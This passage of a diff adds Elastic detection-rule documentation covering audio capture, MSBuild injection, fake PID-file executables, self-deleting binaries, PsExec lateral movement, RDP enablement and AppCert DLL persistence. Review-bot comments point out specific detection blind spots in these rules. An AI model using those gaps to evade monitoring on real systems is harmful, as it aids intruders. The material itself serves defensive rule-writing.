Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Examine file or network events from the involved PowerShell process for suspicious behavior. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Evaluate whether the user needs to use PowerShell to complete tasks. +- Investigate if the script stores the recorded data locally and determine if anything was recorded. +- Investigate whether the script contains exfiltration capabilities and identify the exfiltration server. +- Assess network data to determine if the host communicated with the exfiltration server. + +### False positive analysis + +- Regular users should not need scripts to capture audio, which makes false positives unlikely. In the case of authorized benign true positives (B-TPs), exceptions can be added. + +### Related rules + +- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe +- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved hosts to prevent further post-compromise behavior. +- Prioritize the response if this alert involves key executives or potentially valuable targets for espionage. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. 
+- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +event.category:process and host.os.type:windows and + powershell.file.script_block_text : ( + "Get-MicrophoneAudio" or + "WindowsAudioDevice-Powershell-Cmdlet" or + (waveInGetNumDevs and mciSendStringA) + ) + and not powershell.file.script_block_text : ( + "sentinelbreakpoints" and "Set-PSBreakpoint" and "PowerSploitIndicators" + ) + and not user.id : "S-1-5-18" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Collection +** ID: TA0009 +** Reference URL: https://attack.mitre.org/tactics/TA0009/ +* Technique: +** Name: Audio Capture +** ID: T1123 +** Reference URL: https://attack.mitre.org/techniques/T1123/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: PowerShell +** ID: T1059.001 +** Reference URL: https://attack.mitre.org/techniques/T1059/001/ +* Technique: +** Name: Native API +** ID: T1106 +** Reference URL: https://attack.mitre.org/techniques/T1106/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-process-injection-by-the-microsoft-build-engine.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-process-injection-by-the-microsoft-build-engine.asciidoc new file mode 100644 index 0000000000..72f480d007 --- /dev/null 
+++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-process-injection-by-the-microsoft-build-engine.asciidoc 
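Review bot: `not user.id : "S-1-5-18"` in the audio-capture rule query (prebuilt-rule-8-10-5-powershell-suspicious-script-with-audio-capture-capabilities.asciidoc, the hunk above) exempts SYSTEM only, while the discovery rule in the previous hunk exempts S-1-5-18 and S-1-5-19; if the difference is intentional, say so in the False positive analysis, otherwise align the two. The exception `not powershell.file.script_block_text : ("sentinelbreakpoints" and "Set-PSBreakpoint" and "PowerSploitIndicators")` is not explained anywhere in the guide; a one-line note on what emits those script blocks would help an analyst who sees the rule stay quiet on a host where that tooling runs. As with the discovery rule, a Setup section stating that `powershell.file.script_block_text` requires script block logging (Event ID 4104) is missing.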
@@ -0,0 +1,77 @@ +[[prebuilt-rule-8-10-5-process-injection-by-the-microsoft-build-engine]] +=== Process Injection by the Microsoft Build Engine + +An instance of MSBuild, the Microsoft Build Engine, created a thread in another process. This technique is sometimes used to evade detection or elevate privileges. + +*Rule type*: query + +*Rule indices*: + +* winlogbeat-* +* logs-windows.* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: None ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Tactic: Privilege Escalation +* Data Source: Sysmon Only + +*Version*: 105 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process.name:MSBuild.exe and host.os.type:windows and event.action:"CreateRemoteThread detected (rule: CreateRemoteThread)" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Process Injection +** ID: T1055 +** Reference URL: https://attack.mitre.org/techniques/T1055/ +* Technique: +** Name: Trusted Developer Utilities Proxy Execution +** ID: T1127 +** Reference URL: https://attack.mitre.org/techniques/T1127/ +* Sub-technique: +** Name: MSBuild +** ID: T1127.001 +** Reference URL: https://attack.mitre.org/techniques/T1127/001/ +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Process Injection +** ID: T1055 +** Reference URL: https://attack.mitre.org/techniques/T1055/ 
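Review bot: `*Searches indices from*: None` in this hunk means the MSBuild process-injection rule has no additional look-back, unlike every other rule in this patch (`now-9m` with `Runs every: 5m`); with a 5-minute interval and no overlap, Sysmon Event ID 8 records (the `CreateRemoteThread detected (rule: CreateRemoteThread)` action the query matches) that are ingested a few minutes late are never evaluated. Suggest setting `from: now-9m` on the rule so the docs render it, or documenting the gap. Also `process.name:MSBuild.exe` is an exact keyword match and therefore case-sensitive; if the image name is ever recorded in different casing it will not fire, so `process.name:(MSBuild.exe or msbuild.exe)` is safer. The rule also ships without an investigation guide while the neighbouring rules have one; a pointer to the `Trusted Developer Utilities Proxy Execution` context would be enough.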
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-process-started-from-process-id-pid-file.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-process-started-from-process-id-pid-file.asciidoc new file mode 100644 index 0000000000..873fede2f5 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-process-started-from-process-id-pid-file.asciidoc 
@@ -0,0 +1,84 @@ +[[prebuilt-rule-8-10-5-process-started-from-process-id-pid-file]] +=== Process Started from Process ID (PID) File + +Identifies a new process starting from a process ID (PID), lock or reboot file within the temporary file storage paradigm (tmpfs) directory /var/run directory. On Linux, the PID files typically hold the process ID to track previous copies running and manage other tasks. Certain Linux malware use the /var/run directory for holding data, executables and other tasks, disguising itself or these files as legitimate PID files. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* +* endgame-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.sandflysecurity.com/blog/linux-file-masquerading-and-malicious-pids-sandfly-1-2-6-update/ +* https://twitter.com/GossiTheDog/status/1522964028284411907 +* https://exatrack.com/public/Tricephalic_Hellkeeper.pdf +* https://www.elastic.co/security-labs/a-peek-behind-the-bpfdoor + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Execution +* Threat: BPFDoor +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 107 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Process Started from Process ID (PID) File +Detection alerts from this rule indicate a process spawned from an executable masqueraded as a legitimate PID file which is very unusual and should not occur. Here are some possible avenues of investigation: +- Examine parent and child process relationships of the new process to determine if other processes are running. 
+- Examine the /var/run directory using Osquery to determine other potential PID files with unsually large file sizes, indicative of it being an executable: "SELECT f.size, f.uid, f.type, f.path from file f WHERE path like '/var/run/%%';" +- Examine the reputation of the SHA256 hash from the PID file in a database like VirusTotal to identify additional pivots and artifacts for investigation. + + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.type == "start" and user.id == "0" and + process.executable regex~ """/var/run/\w+\.(pid|lock|reboot)""" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-process-termination-followed-by-deletion.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-process-termination-followed-by-deletion.asciidoc new file mode 100644 index 0000000000..6f5e00d6f4 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-process-termination-followed-by-deletion.asciidoc 
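Review bot: `process.executable regex~ """/var/run/\w+\.(pid|lock|reboot)"""` in the PID-file hunk above only matches names made of `\w` characters, so a masqueraded `/var/run/some-daemon.pid` or anything under a subdirectory such as `/var/run/foo/bar.pid` is missed; `[^/]+` would cover hyphenated names without widening the path. Separately, on distributions where `/var/run` is a symlink to `/run`, confirm whether the data source records the path as passed to execve or the resolved `/run/...` path, because the resolved form never matches this regex. Two doc nits in the same hunk: "temporary file storage paradigm (tmpfs) directory /var/run directory" repeats "directory" and should read along the lines of "the /var/run directory (usually tmpfs-backed)", and "unsually" in the osquery step is a typo for "unusually".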
@@ -0,0 +1,141 @@ +[[prebuilt-rule-8-10-5-process-termination-followed-by-deletion]] +=== Process Termination followed by Deletion + +Identifies a process termination event quickly followed by the deletion of its executable file. Malware tools and other non-native files dropped or created on a system by an adversary may leave traces to indicate to what occurred. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Data Source: Elastic Endgame +* Resources: Investigation Guide +* Data Source: Elastic Defend + +*Version*: 107 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Process Termination followed by Deletion + +This rule identifies an unsigned process termination event quickly followed by the deletion of its executable file. Attackers can delete programs after their execution in an attempt to cover their tracks in a host. + +> **Note**: +> This investigation guide uses the {security-guide}/security/master/invest-guide-run-osquery.html[Osquery Markdown Plugin] introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide. + +#### Possible investigation steps + +- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, command line and any spawned child processes. +- Examine the host for derived artifacts that indicate suspicious activities: + - Analyze the process executable using a private sandboxed analysis system. + - Observe and collect information about the following activities in both the sandbox and the alert subject host: + - Attempts to contact external domains and addresses. + - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`. + - Examine the DNS cache for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve DNS Cache","query":"SELECT * FROM dns_cache"}} + - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree. + - Examine the host services for suspicious or anomalous entries. 
+ - !{osquery{"label":"Osquery - Retrieve All Services","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services"}} + - !{osquery{"label":"Osquery - Retrieve Services Running on User Accounts","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\nuser_account == null)\n"}} + - !{osquery{"label":"Osquery - Retrieve Service Unsigned Executables with Virustotal Link","query":"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\n"}} + - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. +- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts. + + +### False positive analysis + +- This activity is unlikely to happen legitimately, as programs that exhibit this behavior, such as installers and similar utilities, should be signed. Benign true positives (B-TPs) can be added as exceptions if necessary. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. 
+ - Immediately block the identified indicators of compromise (IoCs). + - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Remove and block malicious artifacts identified during triage. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +sequence by host.id with maxspan=5s + [process where host.os.type == "windows" and event.type == "end" and + process.code_signature.trusted != true and + not process.executable : ("C:\\Windows\\SoftwareDistribution\\*.exe", "C:\\Windows\\WinSxS\\*.exe") + ] by process.executable + [file where host.os.type == "windows" and event.type == "deletion" and file.extension : ("exe", "scr", "com") and + not process.executable : + ("?:\\Program Files\\*.exe", + "?:\\Program Files (x86)\\*.exe", + "?:\\Windows\\System32\\svchost.exe", + "?:\\Windows\\System32\\drvinst.exe") and + not file.path : ("?:\\Program Files\\*.exe", "?:\\Program Files (x86)\\*.exe") + ] by file.path + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Masquerading +** ID: T1036 +** Reference URL: https://attack.mitre.org/techniques/T1036/ +* Sub-technique: +** Name: Invalid Code Signature +** ID: T1036.001 +** Reference URL: https://attack.mitre.org/techniques/T1036/001/ +* Technique: +** Name: Indicator Removal +** ID: T1070 +** Reference URL: 
https://attack.mitre.org/techniques/T1070/ +* Sub-technique: +** Name: File Deletion +** ID: T1070.004 +** Reference URL: https://attack.mitre.org/techniques/T1070/004/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-psexec-network-connection.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-psexec-network-connection.asciidoc new file mode 100644 index 0000000000..5f7e0e53e1 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-psexec-network-connection.asciidoc 
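Review bot: the sequence in the process-termination hunk above joins its two stages with `by process.executable` and `by file.path`, an exact keyword comparison; if the process end event and the file deletion event record the same path with different casing, the sequence never completes and the rule is silent. Either normalize upstream or note in the guide that the join is case-sensitive. Also the guide describes the trigger as an "unsigned process termination", but `process.code_signature.trusted != true` also matches binaries signed by an untrusted or revoked certificate, so "not trusted-signed" is the accurate wording, and the False positive analysis ("should be signed") should use the same phrasing.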
@@ -0,0 +1,134 @@ +[[prebuilt-rule-8-10-5-psexec-network-connection]] +=== PsExec Network Connection + +Identifies use of the SysInternals tool PsExec.exe making a network connection. This could be an indication of lateral movement. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Execution +* Tactic: Lateral Movement +* Resources: Investigation Guide +* Data Source: Elastic Defend + +*Version*: 107 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating PsExec Network Connection + +PsExec is a remote administration tool that enables the execution of commands with both regular and SYSTEM privileges on Windows systems. Microsoft develops it as part of the Sysinternals Suite. Although commonly used by administrators, PsExec is frequently used by attackers to enable lateral movement and execute commands as SYSTEM to disable defenses and bypass security protections. + +This rule identifies PsExec execution by looking for the creation of `PsExec.exe`, the default name for the utility, followed by a network connection done by the process. + +#### Possible investigation steps + +- Check if the usage of this tool complies with the organization's administration policy. +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. 
+- Investigate other alerts associated with the user/host during the past 48 hours. +- Identify the user account that performed the action and whether it should perform this kind of action. +- Identify the target computer and its role in the IT environment. +- Investigate what commands were run, and assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts. + +### False positive analysis + +- This mechanism can be used legitimately. As long as the analyst did not identify suspicious activity related to the user or involved hosts, and the tool is allowed by the organization's policy, such alerts can be dismissed. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. + - Prioritize cases involving critical servers and users. +- Isolate the involved hosts to prevent further post-compromise behavior. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Review the privileges assigned to the user to ensure that the least privilege principle is being followed. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). 
+ +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +sequence by process.entity_id + [process where host.os.type == "windows" and process.name : "PsExec.exe" and event.type == "start" and + + /* This flag suppresses the display of the license dialog and may + indicate that psexec executed for the first time in the machine */ + process.args : "-accepteula" and + + not process.executable : ("?:\\ProgramData\\Docusnap\\Discovery\\discovery\\plugins\\17\\Bin\\psexec.exe", + "?:\\Docusnap 11\\Bin\\psexec.exe", + "?:\\Program Files\\Docusnap X\\Bin\\psexec.exe", + "?:\\Program Files\\Docusnap X\\Tools\\dsDNS.exe") and + not process.parent.executable : "?:\\Program Files (x86)\\Cynet\\Cynet Scanner\\CynetScanner.exe"] + [network where host.os.type == "windows" and process.name : "PsExec.exe"] + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: System Services +** ID: T1569 +** Reference URL: https://attack.mitre.org/techniques/T1569/ +* Sub-technique: +** Name: Service Execution +** ID: T1569.002 +** Reference URL: https://attack.mitre.org/techniques/T1569/002/ +* Tactic: +** Name: Lateral Movement +** ID: TA0008 +** Reference URL: https://attack.mitre.org/tactics/TA0008/ +* Technique: +** Name: Remote Services +** ID: T1021 +** Reference URL: https://attack.mitre.org/techniques/T1021/ +* Sub-technique: +** Name: SMB/Windows Admin Shares +** ID: T1021.002 +** Reference URL: https://attack.mitre.org/techniques/T1021/002/ +* Technique: +** Name: Lateral Tool Transfer +** ID: T1570 +** Reference URL: https://attack.mitre.org/techniques/T1570/ 
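Review bot: `process.name : "PsExec.exe"` in both stages of the PsExec sequence above misses `PsExec64.exe`, the 64-bit binary shipped in the same Sysinternals package, and `process.args : "-accepteula"` misses the `/accepteula` spelling Sysinternals tools also accept and, by design, every run after the EULA has already been accepted on that host; the guide should say the rule catches a first-run PsExec (as the query comment admits) rather than "PsExec execution" in general. Suggest `process.name : ("PsExec.exe", "PsExec64.exe")` and `process.args : ("-accepteula", "/accepteula")`, and consider pivoting on `process.pe.original_file_name` as well, since that survives a renamed binary. Also the guide's "looking for the creation of `PsExec.exe`" describes a process start (`event.type == "start"`), not a file creation; say "start" to avoid confusion with file events.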
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-rdp-enabled-via-registry.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-rdp-enabled-via-registry.asciidoc new file mode 100644 index 0000000000..66b062e6e4 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-rdp-enabled-via-registry.asciidoc 
@@ -0,0 +1,128 @@ +[[prebuilt-rule-8-10-5-rdp-enabled-via-registry]] +=== RDP Enabled via Registry + +Identifies registry write modifications to enable Remote Desktop Protocol (RDP) access. This could be indicative of adversary lateral movement preparation. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* +* winlogbeat-* +* logs-windows.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Lateral Movement +* Tactic: Defense Evasion +* Resources: Investigation Guide +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 108 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating RDP Enabled via Registry + +Microsoft Remote Desktop Protocol (RDP) is a proprietary Microsoft protocol that enables remote connections to other computers, typically over TCP port 3389. + +Attackers can use RDP to conduct their actions interactively. Ransomware operators frequently use RDP to access victim servers, often using privileged accounts. + +This rule detects modification of the fDenyTSConnections registry key to the value `0`, which specifies that remote desktop connections are enabled. Attackers can abuse remote registry, use psexec, etc., to enable RDP and move laterally. + +#### Possible investigation steps + +- Identify the user account that performed the action and whether it should perform this kind of action. +- Contact the user to check if they are aware of the operation. +- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Check whether it makes sense to enable RDP to this host, given its role in the environment. +- Check if the host is directly exposed to the internet. +- Check whether privileged accounts accessed the host shortly after the modification. +- Review network events within a short timespan of this alert for incoming RDP connection attempts. + +### False positive analysis + +- This mechanism can be used legitimately. Check whether the user should be performing this kind of activity, whether they are aware of it, whether RDP should be open, and whether the action exposes the environment to unnecessary risks. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- If RDP is needed, make sure to secure it using firewall rules: + - Allowlist RDP traffic to specific trusted hosts. + - Restrict RDP logins to authorized non-administrator accounts, where possible. +- Isolate the involved hosts to prevent further post-compromise behavior. +- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). 
+---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +registry where host.os.type == "windows" and + event.type in ("creation", "change") and + registry.path : "HKLM\\SYSTEM\\*ControlSet*\\Control\\Terminal Server\\fDenyTSConnections" and + registry.data.strings : ("0", "0x00000000") and + not process.executable : ("?:\\Windows\\System32\\SystemPropertiesRemote.exe", + "?:\\Windows\\System32\\SystemPropertiesComputerName.exe", + "?:\\Windows\\System32\\SystemPropertiesAdvanced.exe", + "?:\\Windows\\System32\\SystemSettingsAdminFlows.exe", + "?:\\Windows\\WinSxS\\*\\TiWorker.exe", + "?:\\Windows\\system32\\svchost.exe") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Lateral Movement +** ID: TA0008 +** Reference URL: https://attack.mitre.org/tactics/TA0008/ +* Technique: +** Name: Remote Services +** ID: T1021 +** Reference URL: https://attack.mitre.org/techniques/T1021/ +* Sub-technique: +** Name: Remote Desktop Protocol +** ID: T1021.001 +** Reference URL: https://attack.mitre.org/techniques/T1021/001/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Modify Registry +** ID: T1112 +** Reference URL: https://attack.mitre.org/techniques/T1112/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-registry-persistence-via-appcert-dll.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-registry-persistence-via-appcert-dll.asciidoc new file mode 100644 index 0000000000..158973b487 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-registry-persistence-via-appcert-dll.asciidoc 
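Review bot: the blanket `"?:\\Windows\\system32\\svchost.exe"` entry in the rule query's `not process.executable : (...)` list suppresses the exact vector the investigation guide warns about ("Attackers can abuse remote registry, use psexec, etc., to enable RDP"), since remote registry writes arrive on the host through a service-host process rather than the attacker's tool. Either narrow that exclusion (for example by pairing it with the expected `process.args` for the legitimate service group) or state the blind spot explicitly under "False positive analysis" so analysts know remote registry modification of `fDenyTSConnections` will not alert.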
@@ -0,0 +1,93 @@ +[[prebuilt-rule-8-10-5-registry-persistence-via-appcert-dll]] +=== Registry Persistence via AppCert DLL + +Detects attempts to maintain persistence by creating registry keys using AppCert DLLs. AppCert DLLs are loaded by every process using the common API functions to create processes. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Persistence +* Tactic: Privilege Escalation +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 105 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +registry where host.os.type == "windows" and +/* uncomment once stable length(bytes_written_string) > 0 and */ + registry.path : ( + "HKLM\\SYSTEM\\*ControlSet*\\Control\\Session Manager\\AppCertDLLs\\*", + "\\REGISTRY\\MACHINE\\SYSTEM\\*ControlSet*\\Control\\Session Manager\\AppCertDLLs\\*" + ) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Event Triggered Execution +** ID: T1546 +** Reference URL: https://attack.mitre.org/techniques/T1546/ +* Sub-technique: +** Name: AppCert DLLs +** ID: T1546.009 +** Reference URL: https://attack.mitre.org/techniques/T1546/009/ +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: 
https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Event Triggered Execution +** ID: T1546 +** Reference URL: https://attack.mitre.org/techniques/T1546/ +* Sub-technique: +** Name: AppCert DLLs +** ID: T1546.009 +** Reference URL: https://attack.mitre.org/techniques/T1546/009/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-registry-persistence-via-appinit-dll.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-registry-persistence-via-appinit-dll.asciidoc new file mode 100644 index 0000000000..7cab395f01 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-registry-persistence-via-appinit-dll.asciidoc 
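Review bot: the empty `[source, markdown]` investigation guide block and the commented-out clause `/* uncomment once stable length(bytes_written_string) > 0 and */` in the rule query are development residue that should not ship in the 8.10.5 documentation. Either populate the guide (and add the `Resources: Investigation Guide` tag as the neighbouring rules do) or drop the empty block, and remove or resolve the comment, which references a field (`bytes_written_string`) that appears nowhere else in the rule. Note also that, unlike the RDP rule in this package, the query carries no `event.type in ("creation", "change")` constraint; if that is intentional, say so.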
